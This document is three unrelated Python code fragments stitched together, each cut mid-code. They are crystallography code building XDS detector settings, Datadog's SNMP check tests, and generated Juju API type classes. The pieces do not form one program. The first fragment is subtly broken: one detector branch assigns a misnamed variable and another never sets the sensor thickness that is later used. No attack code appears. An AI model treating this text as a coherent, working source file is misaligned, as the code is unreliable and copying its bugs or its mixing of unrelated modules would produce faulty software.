f.write(line + '\n')
@staticmethod
def getXDSDetector(dictDetector):
dictXDSDetector = None
detectorType = dictDetector["type"]
nx = UtilsDetector.getNx(detectorType)
ny = UtilsDetector.getNy(detectorType)
pixel = UtilsDetector.getPixelsize(detectorType)
orgX = round(dictDetector['beamPositionX'] / pixel, 3)
orgY = round(dictDetector['beamPositionY'] / pixel, 3)
if detectorType == "pilatus2m":
untrustedRectangle = \
[[487, 495, 0, 1680],
[981, 989, 0, 1680],
[0, 1476, 195, 213],
[0, 1476, 407, 425],
[0, 1476, 619, 637],
[0, 1476, 831, 849],
[0, 1476, 1043, 1061],
[0, 1476, 1255, 1273],
[0, 1476, 1467, 1485]]
sensorThickness = 0.32
elif detectorType == "pilatus6m":
listUntrustedRectangle = \
[[ 487, 495, 0, 2528],
[ 981, 989, 0, 2528],
[1475, 1483, 0, 2528],
[1969, 1977, 0, 2528],
[ 0, 2464, 195, 213],
[ 0, 2464, 407, 425],
[ 0, 2464, 619, 637],
[ 0, 2464, 831, 849],
[ 0, 2464, 1043, 1061],
[ 0, 2464, 1255, 1273],
[ 0, 2464, 1467, 1485],
[ 0, 2464, 1679, 1697],
[ 0, 2464, 1891, 1909],
[ 0, 2464, 2103, 2121],
[ 0, 2464, 2315, 2333]]
sensorThickness = 0.32
elif detectorType == "eiger4m":
untrustedRectangle = \
[[1029, 1040, 0, 2167],
[0, 2070, 512, 550],
[0, 2070, 1063, 1103],
[0, 2070, 1614, 1654],
]
sensorThickness = 0.32
elif detectorType == "eiger9m":
untrustedRectangle = \
[[1029, 1040, 0, 3269],
[2069, 2082, 0, 3269],
[0, 3110, 513, 553],
[0, 3110, 1064, 1104],
[0, 3110, 1615, 1655],
[0, 3110, 2166, 2206],
[0, 3110, 2717, 2757],
]
else:
raise RuntimeError("Unknown detector: {0}".format(detectorType))
dictXDSDetector = {
"name": "PILATUS",
"nx": nx,
"ny": ny,
"orgX": orgX,
"orgY": orgY,
"pixel": pixel,
# "untrustedRectangle": untrustedRectangle,
"trustedRegion": [0.0, 1.41],
"trustedpixel": [7000, 30000],
"minimumValidPixelValue": 0,
"overload": 1048500,
"sensorThickness": sensorThickness
}
return dictXDSDetector
class XDSIndexing(XDSTask):
def generateXDS_INP(self, inData):
firstSubWedge = inData["subWedge"][0]
listDozorSpotFile = inData['dozorSpotFile']
experimentalCondition = firstSubWedge['experimentalCondition']
goniostat = experimentalCondition['goniostat']
oscRange = goniostat['oscillationWidth']
XDSTask.writeSPOT_XDS(listDozorSpotFile, oscRange=oscRange, workingDirectory=self.getWorkingDirectory())
listXDS_INP = XDSTask.generateXDS_INP(inData)
listXDS_INP.insert(0, 'JOB= IDXREF')
listXDS_INP.append("DATA_RANGE= 1 360")
return listXDS_INP
@staticmethod
def parseXDSOutput(workingDirectory):
idxrefPath = workingDirectory / 'IDXREF.LP'
xparmPath = workingDirectory / 'XPARM.XDS'
outData = {
"idxref": XDSIndexing.readIdxrefLp(idxrefPath),
"xparm": XDSIndexing.parseXparm(xparmPath),
"xparmXdsPath": xparmPath
}
return outData
@staticmethod
def readIdxrefLp(pathToIdxrefLp, resultXDSIndexing=None):
if resultXDSIndexing is None:
resultXDSIndexing = {}
if pathToIdxrefLp.exists():
with | |
<filename>snmp/tests/test_check.py
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import ipaddress
import logging
import os
import socket
import time
import mock
import pytest
import yaml
from datadog_checks.base import ConfigurationError, to_native_string
from datadog_checks.dev import temp_dir
from datadog_checks.snmp import SnmpCheck
from . import common
pytestmark = [pytest.mark.usefixtures("dd_environment"), common.python_autodiscovery_only]
def test_command_generator():
"""
Command generator's parameters should match init_config
"""
instance = common.generate_instance_config(common.CONSTRAINED_OID)
check = SnmpCheck('snmp', common.MIBS_FOLDER, [instance])
config = check._config
# Test command generator MIB source
mib_folders = config._snmp_engine.getMibBuilder().getMibSources()
full_path_mib_folders = [f.fullPath() for f in mib_folders]
assert check.ignore_nonincreasing_oid is False # Default value
check = SnmpCheck('snmp', common.IGNORE_NONINCREASING_OID, [instance])
assert check.ignore_nonincreasing_oid
assert common.MIBS_FOLDER["mibs_folder"] in full_path_mib_folders
def test_type_support(aggregator):
"""
Support expected types
"""
metrics = common.SUPPORTED_METRIC_TYPES + common.UNSUPPORTED_METRICS
instance = common.generate_instance_config(metrics)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for metric in common.SUPPORTED_METRIC_TYPES:
metric_name = "snmp." + metric['name']
aggregator.assert_metric(metric_name, tags=common.CHECK_TAGS, count=1)
for metric in common.UNSUPPORTED_METRICS:
metric_name = "snmp." + metric['name']
aggregator.assert_metric(metric_name, tags=common.CHECK_TAGS, count=0)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_transient_error(aggregator):
instance = common.generate_instance_config(common.SUPPORTED_METRIC_TYPES)
check = common.create_check(instance)
with mock.patch('datadog_checks.snmp.commands._handle_error', side_effect=RuntimeError):
check.check(instance)
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.CRITICAL, tags=common.CHECK_TAGS, at_least=1)
check.check(instance)
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
def test_snmpget(aggregator):
"""
When failing with 'snmpget' command, SNMP check falls back to 'snmpgetnext'
> snmpget -v2c -c public localhost:11111 1.3.6.1.2.1.25.6.3.1.4
iso.3.6.1.2.1.25.6.3.1.4 = No Such Instance currently exists at this OID
> snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.6.3.1.4
iso.3.6.1.2.1.25.6.3.1.4.0 = INTEGER: 4
"""
instance = common.generate_instance_config(common.PLAY_WITH_GET_NEXT_METRICS)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for metric in common.PLAY_WITH_GET_NEXT_METRICS:
metric_name = "snmp." + metric['name']
aggregator.assert_metric(metric_name, tags=common.CHECK_TAGS, at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_custom_mib(aggregator):
instance = common.generate_instance_config([oid for oid, _, _ in common.DUMMY_MIB_OID])
instance["community_string"] = "dummy"
check = SnmpCheck('snmp', common.MIBS_FOLDER, [instance])
check.check(instance)
# Test metrics
for metric, metric_type, value in common.DUMMY_MIB_OID:
metric_name = "snmp." + (metric.get('name') or metric.get('symbol'))
aggregator.assert_metric(metric_name, metric_type=metric_type, count=1, value=value, tags=common.CHECK_TAGS)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
def test_scalar(aggregator):
"""
Support SNMP scalar objects
"""
instance = common.generate_instance_config(common.SCALAR_OBJECTS)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for metric in common.SCALAR_OBJECTS:
metric_name = "snmp." + (metric.get('name') or metric.get('symbol'))
aggregator.assert_metric(metric_name, tags=common.CHECK_TAGS, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_enforce_constraint(aggregator):
instance = common.generate_instance_config(common.CONSTRAINED_OID)
instance["community_string"] = "constraint"
instance["enforce_mib_constraints"] = True
check = common.create_check(instance)
check.check(instance)
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.CRITICAL, tags=common.CHECK_TAGS, at_least=1)
assert "failed at: ValueConstraintError" in aggregator.service_checks("snmp.can_check")[0].message
def test_unenforce_constraint(aggregator):
"""
Allow ignoring constraints
"""
instance = common.generate_instance_config(common.CONSTRAINED_OID)
instance["community_string"] = "constraint"
instance["enforce_mib_constraints"] = False
check = common.create_check(instance)
check.check(instance)
# Test metrics
for metric in common.CONSTRAINED_OID:
metric_name = "snmp." + (metric.get('name') or metric.get('symbol'))
aggregator.assert_metric(metric_name, tags=common.CHECK_TAGS, count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_table(aggregator):
"""
Support SNMP tabular objects
"""
instance = common.generate_instance_config(common.TABULAR_OBJECTS)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for symbol in common.TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
for mtag in common.TABULAR_OBJECTS[0]['metric_tags']:
tag = mtag['tag']
aggregator.assert_metric_has_tag_prefix(metric_name, tag, at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_table_regex_match(aggregator):
metrics = [
{
'MIB': "IF-MIB",
'table': "ifTable",
'symbols': ["ifInOctets", "ifOutOctets"],
'metric_tags': [
{'tag': "interface", 'column': "ifDescr"},
{'column': "ifDescr", 'match': '(\\w)(\\w+)', 'tags': {'prefix': '\\1', 'suffix': '\\2'}},
],
}
]
common_tags = ['snmp_device:localhost']
instance = common.generate_instance_config(metrics)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for symbol in common.TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
for interface in ['tunl0', 'eth0', 'ip6tnl0']:
tags = common_tags + [
'interface:{}'.format(interface),
'prefix:{}'.format(interface[:1]),
'suffix:{}'.format(interface[1:]),
]
aggregator.assert_metric(metric_name, tags=tags)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
common.assert_common_metrics(aggregator)
aggregator.assert_all_metrics_covered()
def test_resolved_table(aggregator):
instance = common.generate_instance_config(common.RESOLVED_TABULAR_OBJECTS)
check = common.create_check(instance)
check.check(instance)
for symbol in common.TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
for mtag in common.TABULAR_OBJECTS[0]['metric_tags']:
tag = mtag['tag']
aggregator.assert_metric_has_tag_prefix(metric_name, tag, at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_table_v3_MD5_DES(aggregator):
"""
Support SNMP V3 priv modes: MD5 + DES
"""
# build multiple confgs
auth = 'MD5'
priv = 'DES'
name = 'instance_{}_{}'.format(auth, priv)
instance = common.generate_v3_instance_config(
common.TABULAR_OBJECTS,
name=name,
user='datadog{}{}'.format(auth.upper(), priv.upper()),
auth=common.AUTH_PROTOCOLS[auth],
auth_key=common.AUTH_KEY,
priv=common.PRIV_PROTOCOLS[priv],
priv_key=common.PRIV_KEY,
)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for symbol in common.TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
for mtag in common.TABULAR_OBJECTS[0]['metric_tags']:
tag = mtag['tag']
aggregator.assert_metric_has_tag_prefix(metric_name, tag, at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_table_v3_MD5_AES(aggregator):
"""
Support SNMP V3 priv modes: MD5 + AES
"""
# build multiple confgs
auth = 'MD5'
priv = 'AES'
name = 'instance_{}_{}'.format(auth, priv)
instance = common.generate_v3_instance_config(
common.TABULAR_OBJECTS,
name=name,
user='datadog{}{}'.format(auth.upper(), priv.upper()),
auth=auth,
auth_key=common.AUTH_KEY,
priv=priv,
priv_key=common.PRIV_KEY,
)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for symbol in common.TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
for mtag in common.TABULAR_OBJECTS[0]['metric_tags']:
tag = mtag['tag']
aggregator.assert_metric_has_tag_prefix(metric_name, tag, at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_table_v3_SHA_DES(aggregator):
"""
Support SNMP V3 priv modes: SHA + DES
"""
# build multiple confgs
auth = 'SHA'
priv = 'DES'
name = 'instance_{}_{}'.format(auth, priv)
instance = common.generate_v3_instance_config(
common.TABULAR_OBJECTS,
name=name,
user='datadog{}{}'.format(auth.upper(), priv.upper()),
auth=auth,
auth_key=common.AUTH_KEY,
priv=priv,
priv_key=common.PRIV_KEY,
)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for symbol in common.TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
for mtag in common.TABULAR_OBJECTS[0]['metric_tags']:
tag = mtag['tag']
aggregator.assert_metric_has_tag_prefix(metric_name, tag, at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_table_v3_SHA_AES(aggregator):
"""
Support SNMP V3 priv modes: SHA + AES
"""
# build multiple confgs
auth = 'SHA'
priv = 'AES'
name = 'instance_{}_{}'.format(auth, priv)
instance = common.generate_v3_instance_config(
common.TABULAR_OBJECTS,
name=name,
user='datadog{}{}'.format(auth.upper(), priv.upper()),
auth=common.AUTH_PROTOCOLS[auth],
auth_key=common.AUTH_KEY,
priv=common.PRIV_PROTOCOLS[priv],
priv_key=common.PRIV_KEY,
)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for symbol in common.TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
for mtag in common.TABULAR_OBJECTS[0]['metric_tags']:
tag = mtag['tag']
aggregator.assert_metric_has_tag_prefix(metric_name, tag, at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_bulk_table(aggregator):
instance = common.generate_instance_config(common.BULK_TABULAR_OBJECTS)
instance['bulk_threshold'] = 5
check = common.create_check(instance)
check.check(instance)
# Test metrics
for symbol in common.BULK_TABULAR_OBJECTS[0]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
for mtag in common.BULK_TABULAR_OBJECTS[0]['metric_tags']:
tag = mtag['tag']
aggregator.assert_metric_has_tag_prefix(metric_name, tag, at_least=1)
for symbol in common.BULK_TABULAR_OBJECTS[1]['symbols']:
metric_name = "snmp." + symbol
aggregator.assert_metric(metric_name, at_least=1)
aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_invalid_metric(aggregator):
"""
Invalid metrics raise a Warning and a critical service check
"""
instance = common.generate_instance_config(common.INVALID_METRICS)
check = common.create_check(instance)
check.check(instance)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.WARNING, tags=common.CHECK_TAGS, at_least=1)
def test_forcedtype_metric(aggregator):
"""
Forced Types should be reported as metrics of the forced type
"""
instance = common.generate_instance_config(common.FORCED_METRICS)
check = common.create_check(instance)
check.check(instance)
aggregator.assert_metric('snmp.IAmAGauge32', tags=common.CHECK_TAGS, count=1, metric_type=aggregator.RATE)
aggregator.assert_metric('snmp.IAmACounter64', tags=common.CHECK_TAGS, count=1, metric_type=aggregator.GAUGE)
aggregator.assert_metric(
'snmp.IAmAOctetStringFloat', tags=common.CHECK_TAGS, value=3.1415, count=1, metric_type=aggregator.GAUGE
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_invalid_forcedtype_metric(aggregator, caplog):
"""
If a forced type is invalid a warning should be issued
but the check should continue processing the remaining metrics.
"""
instance = common.generate_instance_config(common.INVALID_FORCED_METRICS)
check = common.create_check(instance)
check.check(instance)
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
assert "Unable to submit metric" in caplog.text
def test_scalar_with_tags(aggregator):
"""
Support SNMP scalar objects with tags
"""
instance = common.generate_instance_config(common.SCALAR_OBJECTS_WITH_TAGS)
check = common.create_check(instance)
check.check(instance)
# Test metrics
for metric in common.SCALAR_OBJECTS_WITH_TAGS:
metric_name = "snmp." + (metric.get('name') or metric.get('symbol'))
tags = common.CHECK_TAGS + metric.get('metric_tags')
aggregator.assert_metric(metric_name, tags=tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_network_failure(aggregator):
"""
Network failure is reported in service check
"""
instance = common.generate_instance_config(common.SCALAR_OBJECTS)
# Change port so connection will fail
instance['port'] = 162
check = common.create_check(instance)
check.check(instance)
# Test service check
aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.CRITICAL, tags=common.CHECK_TAGS, at_least=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_cast_metrics(aggregator):
instance = common.generate_instance_config(common.CAST_METRICS)
check = common.create_check(instance)
check.check(instance)
aggregator.assert_metric('snmp.cpuload1', value=0.06)
aggregator.assert_metric('snmp.cpuload2', value=0.06)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
common.assert_common_metrics(aggregator)
aggregator.all_metrics_asserted()
def test_profile(aggregator):
instance = common.generate_instance_config([])
instance['profile'] = 'profile1'
init_config = {'profiles': {'profile1': {'definition': {'metrics': common.SUPPORTED_METRIC_TYPES}}}}
check = SnmpCheck('snmp', init_config, [instance])
check.check(instance)
common_tags = common.CHECK_TAGS + ['snmp_profile:profile1']
for metric in common.SUPPORTED_METRIC_TYPES:
metric_name = "snmp." + metric['name']
aggregator.assert_metric(metric_name, tags=common_tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
common.assert_common_metrics(aggregator)
aggregator.assert_all_metrics_covered()
def test_profile_by_file(aggregator):
instance = common.generate_instance_config([])
instance['profile'] = 'profile1'
with temp_dir() as tmp:
profile_file = os.path.join(tmp, 'profile1.yaml')
with open(profile_file, 'w') as f:
f.write(yaml.safe_dump({'metrics': common.SUPPORTED_METRIC_TYPES}))
init_config = {'profiles': {'profile1': {'definition_file': profile_file}}}
check = SnmpCheck('snmp', init_config, [instance])
check.check(instance)
common_tags = common.CHECK_TAGS + ['snmp_profile:profile1']
for metric in common.SUPPORTED_METRIC_TYPES:
metric_name = "snmp." + metric['name']
aggregator.assert_metric(metric_name, tags=common_tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
common.assert_common_metrics(aggregator)
aggregator.assert_all_metrics_covered()
def test_profile_sys_object(aggregator):
instance = common.generate_instance_config([])
init_config = | |
bool
suspended_reason : str
'''
application_token_ = application_token
changed_units_ = [RemoteRelationUnitChange.from_json(o) for o in changed_units or []]
departed_units_ = departed_units
force_cleanup_ = force_cleanup
life_ = life
macaroons_ = [Macaroon.from_json(o) for o in macaroons or []]
relation_token_ = relation_token
suspended_ = suspended
suspended_reason_ = suspended_reason
# Validate arguments against known Juju API types.
if application_token_ is not None and not isinstance(application_token_, (bytes, str)):
raise Exception("Expected application_token_ to be a str, received: {}".format(type(application_token_)))
if changed_units_ is not None and not isinstance(changed_units_, (bytes, str, list)):
raise Exception("Expected changed_units_ to be a Sequence, received: {}".format(type(changed_units_)))
if departed_units_ is not None and not isinstance(departed_units_, (bytes, str, list)):
raise Exception("Expected departed_units_ to be a Sequence, received: {}".format(type(departed_units_)))
if force_cleanup_ is not None and not isinstance(force_cleanup_, bool):
raise Exception("Expected force_cleanup_ to be a bool, received: {}".format(type(force_cleanup_)))
if life_ is not None and not isinstance(life_, (bytes, str)):
raise Exception("Expected life_ to be a str, received: {}".format(type(life_)))
if macaroons_ is not None and not isinstance(macaroons_, (bytes, str, list)):
raise Exception("Expected macaroons_ to be a Sequence, received: {}".format(type(macaroons_)))
if relation_token_ is not None and not isinstance(relation_token_, (bytes, str)):
raise Exception("Expected relation_token_ to be a str, received: {}".format(type(relation_token_)))
if suspended_ is not None and not isinstance(suspended_, bool):
raise Exception("Expected suspended_ to be a bool, received: {}".format(type(suspended_)))
if suspended_reason_ is not None and not isinstance(suspended_reason_, (bytes, str)):
raise Exception("Expected suspended_reason_ to be a str, received: {}".format(type(suspended_reason_)))
self.application_token = application_token_
self.changed_units = changed_units_
self.departed_units = departed_units_
self.force_cleanup = force_cleanup_
self.life = life_
self.macaroons = macaroons_
self.relation_token = relation_token_
self.suspended = suspended_
self.suspended_reason = suspended_reason_
self.unknown_fields = unknown_fields
class RemoteRelationDetails(Type):
_toSchema = {'macaroon': 'macaroon', 'relation_token': 'relation-token'}
_toPy = {'macaroon': 'macaroon', 'relation-token': 'relation_token'}
def __init__(self, macaroon=None, relation_token=None, **unknown_fields):
'''
macaroon : Macaroon
relation_token : str
'''
macaroon_ = Macaroon.from_json(macaroon) if macaroon else None
relation_token_ = relation_token
# Validate arguments against known Juju API types.
if macaroon_ is not None and not isinstance(macaroon_, (dict, Macaroon)):
raise Exception("Expected macaroon_ to be a Macaroon, received: {}".format(type(macaroon_)))
if relation_token_ is not None and not isinstance(relation_token_, (bytes, str)):
raise Exception("Expected relation_token_ to be a str, received: {}".format(type(relation_token_)))
self.macaroon = macaroon_
self.relation_token = relation_token_
self.unknown_fields = unknown_fields
class RemoteRelationResult(Type):
_toSchema = {'error': 'error', 'result': 'result'}
_toPy = {'error': 'error', 'result': 'result'}
def __init__(self, error=None, result=None, **unknown_fields):
'''
error : Error
result : RemoteRelation
'''
error_ = Error.from_json(error) if error else None
result_ = RemoteRelation.from_json(result) if result else None
# Validate arguments against known Juju API types.
if error_ is not None and not isinstance(error_, (dict, Error)):
raise Exception("Expected error_ to be a Error, received: {}".format(type(error_)))
if result_ is not None and not isinstance(result_, (dict, RemoteRelation)):
raise Exception("Expected result_ to be a RemoteRelation, received: {}".format(type(result_)))
self.error = error_
self.result = result_
self.unknown_fields = unknown_fields
class RemoteRelationResults(Type):
_toSchema = {'results': 'results'}
_toPy = {'results': 'results'}
def __init__(self, results=None, **unknown_fields):
'''
results : typing.Sequence[~RemoteRelationResult]
'''
results_ = [RemoteRelationResult.from_json(o) for o in results or []]
# Validate arguments against known Juju API types.
if results_ is not None and not isinstance(results_, (bytes, str, list)):
raise Exception("Expected results_ to be a Sequence, received: {}".format(type(results_)))
self.results = results_
self.unknown_fields = unknown_fields
class RemoteRelationUnit(Type):
_toSchema = {'macaroons': 'macaroons', 'relation_token': 'relation-token', 'unit': 'unit'}
_toPy = {'macaroons': 'macaroons', 'relation-token': 'relation_token', 'unit': 'unit'}
def __init__(self, macaroons=None, relation_token=None, unit=None, **unknown_fields):
'''
macaroons : typing.Sequence[~Macaroon]
relation_token : str
unit : str
'''
macaroons_ = [Macaroon.from_json(o) for o in macaroons or []]
relation_token_ = relation_token
unit_ = unit
# Validate arguments against known Juju API types.
if macaroons_ is not None and not isinstance(macaroons_, (bytes, str, list)):
raise Exception("Expected macaroons_ to be a Sequence, received: {}".format(type(macaroons_)))
if relation_token_ is not None and not isinstance(relation_token_, (bytes, str)):
raise Exception("Expected relation_token_ to be a str, received: {}".format(type(relation_token_)))
if unit_ is not None and not isinstance(unit_, (bytes, str)):
raise Exception("Expected unit_ to be a str, received: {}".format(type(unit_)))
self.macaroons = macaroons_
self.relation_token = relation_token_
self.unit = unit_
self.unknown_fields = unknown_fields
class RemoteRelationUnitChange(Type):
_toSchema = {'settings': 'settings', 'unit_id': 'unit-id'}
_toPy = {'settings': 'settings', 'unit-id': 'unit_id'}
def __init__(self, settings=None, unit_id=None, **unknown_fields):
'''
settings : typing.Mapping[str, typing.Any]
unit_id : int
'''
settings_ = settings
unit_id_ = unit_id
# Validate arguments against known Juju API types.
if settings_ is not None and not isinstance(settings_, dict):
raise Exception("Expected settings_ to be a Mapping, received: {}".format(type(settings_)))
if unit_id_ is not None and not isinstance(unit_id_, int):
raise Exception("Expected unit_id_ to be a int, received: {}".format(type(unit_id_)))
self.settings = settings_
self.unit_id = unit_id_
self.unknown_fields = unknown_fields
class RemoteRelationUnits(Type):
_toSchema = {'relation_units': 'relation-units'}
_toPy = {'relation-units': 'relation_units'}
def __init__(self, relation_units=None, **unknown_fields):
'''
relation_units : typing.Sequence[~RemoteRelationUnit]
'''
relation_units_ = [RemoteRelationUnit.from_json(o) for o in relation_units or []]
# Validate arguments against known Juju API types.
if relation_units_ is not None and not isinstance(relation_units_, (bytes, str, list)):
raise Exception("Expected relation_units_ to be a Sequence, received: {}".format(type(relation_units_)))
self.relation_units = relation_units_
self.unknown_fields = unknown_fields
class RemoteRelationsChange(Type):
_toSchema = {'changed': 'changed', 'initial': 'initial', 'removed': 'removed'}
_toPy = {'changed': 'changed', 'initial': 'initial', 'removed': 'removed'}
def __init__(self, changed=None, initial=None, removed=None, **unknown_fields):
'''
changed : typing.Sequence[~RemoteRelationChange]
initial : bool
removed : typing.Sequence[int]
'''
changed_ = [RemoteRelationChange.from_json(o) for o in changed or []]
initial_ = initial
removed_ = removed
# Validate arguments against known Juju API types.
if changed_ is not None and not isinstance(changed_, (bytes, str, list)):
raise Exception("Expected changed_ to be a Sequence, received: {}".format(type(changed_)))
if initial_ is not None and not isinstance(initial_, bool):
raise Exception("Expected initial_ to be a bool, received: {}".format(type(initial_)))
if removed_ is not None and not isinstance(removed_, (bytes, str, list)):
raise Exception("Expected removed_ to be a Sequence, received: {}".format(type(removed_)))
self.changed = changed_
self.initial = initial_
self.removed = removed_
self.unknown_fields = unknown_fields
class RemoteRelationsChanges(Type):
_toSchema = {'changes': 'changes'}
_toPy = {'changes': 'changes'}
def __init__(self, changes=None, **unknown_fields):
'''
changes : typing.Sequence[~RemoteRelationChangeEvent]
'''
changes_ = [RemoteRelationChangeEvent.from_json(o) for o in changes or []]
# Validate arguments against known Juju API types.
if changes_ is not None and not isinstance(changes_, (bytes, str, list)):
raise Exception("Expected changes_ to be a Sequence, received: {}".format(type(changes_)))
self.changes = changes_
self.unknown_fields = unknown_fields
class RemoteRelationsWatchResult(Type):
_toSchema = {'change': 'change', 'error': 'error', 'remoterelationswatcherid': 'RemoteRelationsWatcherId'}
_toPy = {'RemoteRelationsWatcherId': 'remoterelationswatcherid', 'change': 'change', 'error': 'error'}
def __init__(self, remoterelationswatcherid=None, change=None, error=None, **unknown_fields):
'''
remoterelationswatcherid : str
change : RemoteRelationsChange
error : Error
'''
remoterelationswatcherid_ = remoterelationswatcherid
change_ = RemoteRelationsChange.from_json(change) if change else None
error_ = Error.from_json(error) if error else None
# Validate arguments against known Juju API types.
if remoterelationswatcherid_ is not None and not isinstance(remoterelationswatcherid_, (bytes, str)):
raise Exception("Expected remoterelationswatcherid_ to be a str, received: {}".format(type(remoterelationswatcherid_)))
if change_ is not None and not isinstance(change_, (dict, RemoteRelationsChange)):
raise Exception("Expected change_ to be a RemoteRelationsChange, received: {}".format(type(change_)))
if error_ is not None and not isinstance(error_, (dict, Error)):
raise Exception("Expected error_ to be a Error, received: {}".format(type(error_)))
self.remoterelationswatcherid = remoterelationswatcherid_
self.change = change_
self.error = error_
self.unknown_fields = unknown_fields
class RemoteSpace(Type):
_toSchema = {'cloud_type': 'cloud-type', 'name': 'name', 'provider_attributes': 'provider-attributes', 'provider_id': 'provider-id', 'subnets': 'subnets'}
_toPy = {'cloud-type': 'cloud_type', 'name': 'name', 'provider-attributes': 'provider_attributes', 'provider-id': 'provider_id', 'subnets': 'subnets'}
def __init__(self, cloud_type=None, name=None, provider_attributes=None, provider_id=None, subnets=None, **unknown_fields):
'''
cloud_type : str
name : str
